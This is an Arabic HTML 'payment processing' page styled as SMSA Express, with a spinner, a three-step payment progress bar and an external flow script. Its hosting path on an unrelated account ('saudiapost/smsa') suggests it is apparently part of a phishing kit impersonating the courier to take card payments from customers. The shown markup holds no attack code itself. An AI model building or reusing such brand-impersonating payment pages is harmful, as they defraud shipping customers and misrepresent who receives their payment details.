/home2/mshostin/public_html/saudiapost/smsa/loading_payment_ar.html
<!DOCTYPE html>
<html lang="ar" dir="rtl" xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta http-equiv="x-ua-compatible" content="ie=edge" />
    <title>معالجة الدفع | SMSA Express</title>
    <link href="https://fonts.googleapis.com/css2?family=Segoe+UI:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="css/header.css">
    <link rel="stylesheet" href="css/style.css">
    <style>
        html, body {
            direction: rtl;
            text-align: right;
        }

        .st0 {
            fill: #00C8E1;
            stroke: #00C8E1;
            stroke-miterlimit: 10;
        }

        .st1 {
            fill: #153C3F;
            stroke: #153C3F;
            stroke-miterlimit: 10;
        }

        /* LOADING PAGE STYLES */
        .loading-container {
            display: flex;
            align-items: center;
            justify-content: center;
            min-height: calc(100vh - 300px);
            padding: 2rem;
        }

        .loading-content {
            text-align: center;
            max-width: 500px;
        }

        .spinner {
            width: 80px;
            height: 80px;
            margin: 0 auto 2rem;
            position: relative;
        }

        .spinner::before {
            content: '';
            position: absolute;
            width: 100%;
            height: 100%;
            border: 4px solid #f0f0f0;
            border-top: 4px solid #00c8e1;
            border-right: 4px solid #00c8e1;
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }

        .loading-title {
            font-size: 28px;
            font-weight: 700;
            color: #373737;
            margin-bottom: 1rem;
        }

        .loading-description {
            font-size: 16px;
            color: #666;
            margin-bottom: 2rem;
            line-height: 1.6;
        }

        .loading-steps {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-top: 2rem;
            padding: 1.5rem;
            background: #f9f9f9;
            border-radius: 3px;
            border-left: 4px solid #00c8e1;
        }

        .step {
            flex: 1;
            text-align: center;
            position: relative;
        }

        .step-number {
            display: inline-flex;
            align-items: center;
            justify-content: center;
            width: 40px;
            height: 40px;
            background: #e0e0e0;
            border-radius: 50%;
            font-weight: 700;
            color: #666;
            margin-bottom: 0.5rem;
            transition: all 0.3s ease;
        }

        .step.active .step-number {
            background: #00c8e1;
            color: #fff;
        }

        .step.completed .step-number {
            background: #4caf50;
            color: #fff;
        }

        .step-label {
            font-size: 12px;
            color: #666;
            font-weight: 600;
        }

        .step:not(:last-child)::after {
            content: '';
            position: absolute;
            top: 20px;
            left: -50%;
            width: 100%;
            height: 2px;
            background: #e0e0e0;
            z-index: -1;
        }

        .step.completed:not(:last-child)::after {
            background: #4caf50;
        }

        .step.active:not(:last-child)::after {
            background: #00c8e1;
        }

        .progress-bar {
            width: 100%;
            height: 4px;
            background: #e0e0e0;
            border-radius: 2px;
            margin-top: 2rem;
            overflow: hidden;
        }

        .progress-fill {
            height: 100%;
            background: linear-gradient(90deg, #00c8e1, #146e82);
            width: 33%;
            animation: progress 3s ease-in-out infinite;
        }

        @keyframes progress {
            0% {
                width: 10%;
            }
            50% {
                width: 70%;
            }
            100% {
                width: 90%;
            }
        }
    </style>
</head>
<body>
    <div class="page-wrap">
        <div class="header_wrapper">
            <!-- TOP BAR -->
            <div class="top_bar">
                <div class="container flex_me">
                    <div class="col">
                        <ul class="navTop">
                            <li id="individual"><a href="/ar/">الأفراد</a></li>
                            <li id="enterprise"><a href="/ar/enterprise">المؤسسات</a></li>
                            <li id="government"><a href="/ar/government">الحكومة</a></li>
                        </ul>
                    </div>

                    <div class="col">
                        <div class="help_dropdown">
                            <a href="#" class="onMobile_view">المساعدة</a>
                            <div>
                                <span>المساعدة والدعم</span>
                                <ul>
                                    <li><a href="/ar/faq/">الأسئلة الشائعة</a></li>
                                    <li><a href="/ar/customer-service/">خدمة العملاء</a></li>
                                </ul>
                            </div>
                        </div>
                        <a href="#branches" title="الفروع" class="desktop_view" id="scrollToBranch"><img src="/Design/images/branch_icon.svg" alt=""></a>
                        <button type="button" title="بحث" class="search_btn desktop_view btn-srch"><img src="/Design/images/search_icon.svg" alt=""></button>
                        <a class="nav-link switchLang" href="loading_payment.html">English</a>
                        <div class="search_box">
                            <form id="search" name="search" action="/ar/search" method="get">
                                <button type="button" class="close bg-transparent border-0"></button>
                                <div class="search_field">
                                    <span>ابحث في الموقع...</span>
                                    <input name="q" aria-label="بحث" type="text" id="search_cssw" placeholder="ابحث..." value="" autocomplete="off">
                                    <button type="submit"><img src="/Design/images/arrow_icon_white.svg" alt=""></button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>

            <!-- MAIN HEADER -->
            <header>
                <div class="container flex_me">
                    <div class="col flex_me append_menu">
                        <a href="/ar/" class="logo"><img src="images/Logo.svg" alt="SMSA Express"></a>

                        <ul id="menu" class="menuIndividual">
                            <li class="menuMobile">
                                <span>الأفراد</span>
                            </li>
                            <li>
                                <a href="#sending">الإرسال</a>
                            </li>
                            <li>
                                <a href="#receiving">الاستقبال</a>
                            </li>
                            <li>
                                <a href="#alami">العلامي</a>
                            </li>
                            <li>
                                <a href="#national-address">العنوان الوطني</a>
                            </li>
                            <li>
                                <a href="#retail-services">خدمات البيع بالتجزئة</a>
                            </li>
                            <li>
                                <a href="#financial-services">الخدمات المالية</a>
                            </li>
                            <li>
                                <a href="#stamps">الطوابع</a>
                            </li>
                        </ul>
                    </div>

                    <div class="col justify_end">
                        <a href="#login">تسجيل الدخول</a>
                        <a href="#signup" class="sign_up_link">التسجيل</a>
                    </div>
                </div>
            </header>

            <!-- BREADCRUMB -->
            <div class="breadcrumb">
                <div class="container flex_me">
                    <a href="index_ar.html" class="breadcrumb-home">
                        <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 25 27.421">
                            <path d="M7.071,24V16.8h7.857V24H22V8.8L11,0,0,8.8V24Z" transform="translate(1.5 1.921)" fill="none" stroke="#146e82" stroke-miterlimit="10" stroke-width="3"/>
                        </svg>
                    </a>
                    <span class="breadcrumb-separator">›</span>
                    <span>معالجة الدفع</span>
                </div>
            </div>
        </div>

        <!-- MAIN CONTENT -->
        <div class="container">
            <div class="loading-container">
                <div class="loading-content">
                    <div class="spinner"></div>
                    
                    <h1 class="loading-title">معالجة دفعتك</h1>
                    <p class="loading-description">
                        يرجى الانتظار لتأكيد دفعتك.
                    </p>

                    <div class="loading-steps">
                        <div class="step active">
                            <div class="step-number">1</div>
                            <div class="step-label">الدفع</div>
                        </div>
                        <div class="step">
                            <div class="step-number">2</div>
                            <div class="step-label">التحقق</div>
                        </div>
                        <div class="step">
                            <div class="step-number">3</div>
                            <div class="step-label">التأكيد</div>
                        </div>
                    </div>

                    <div class="progress-bar">
                        <div class="progress-fill"></div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <!-- SCRIPTS -->
    <script src="js/loading_payment_flow.js"></script>
</body>
</html>